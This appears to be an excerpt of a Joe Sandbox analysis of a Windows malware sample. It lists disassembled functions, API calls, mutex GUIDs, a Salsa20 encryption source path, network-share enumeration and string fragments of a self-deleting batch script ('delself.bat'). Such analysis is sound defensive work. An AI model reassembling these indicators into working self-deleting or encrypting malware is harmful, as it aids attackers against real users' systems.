Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _wcsstr$Find$CloseExtensionFileNextPath
String ID:
API String ID: 2799698630-0
Opcode ID: 0cd7ff48edd1e73b6d751478125c07911c7fe99ae9d174ea5ce4b5d2735ea3a3
Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
Opcode Fuzzy Hash: 0cd7ff48edd1e73b6d751478125c07911c7fe99ae9d174ea5ce4b5d2735ea3a3
Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A

Function 00423A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__lock_file.LIBCMT ref: 00423A7D

Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76

__fclose_nolock.LIBCMT ref: 00423A88

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
Opcode Fuzzy Hash: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 360932542-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Function 004118C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58

Function 00416950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID:
API String ID: 120817956-0
Opcode ID: 430759de2ec21d0920f62c0ffc1a627718d321eea36c4ba58420f05cd24c7e19
Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
Opcode Fuzzy Hash: 430759de2ec21d0920f62c0ffc1a627718d321eea36c4ba58420f05cd24c7e19
Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9

Function 0041FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C

Function 0041FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12

SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: EnumMessageOpenSend
String ID:
API String ID: 1835186980-0
Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED

Function 0041FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C

Function 004220B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 004220C1

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9

Function 00420FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00420FE8

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89

Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 3190321db6851e34879c411538b69d578517b3d66b58581b09a739f1d9d4ecee
Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
Opcode Fuzzy Hash: 3190321db6851e34879c411538b69d578517b3d66b58581b09a739f1d9d4ecee
Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA

Non-executed Functions

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

OCP, xrefs: 004382C4
ACP, xrefs: 004382B3

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

"if exist ", xrefs: 00412648
@echo off:trydel ", xrefs: 0041262A
D, xrefs: 00412720
TEMP, xrefs: 004125DF
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
" goto try, xrefs: 00412666
del ", xrefs: 00412674
delself.bat, xrefs: 0041261C
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32(00000000,?), ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

, xrefs: 00463A90
-----END , xrefs: 0046382F, 00463940, 004639E4
-----BEGIN , xrefs: 004636A4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

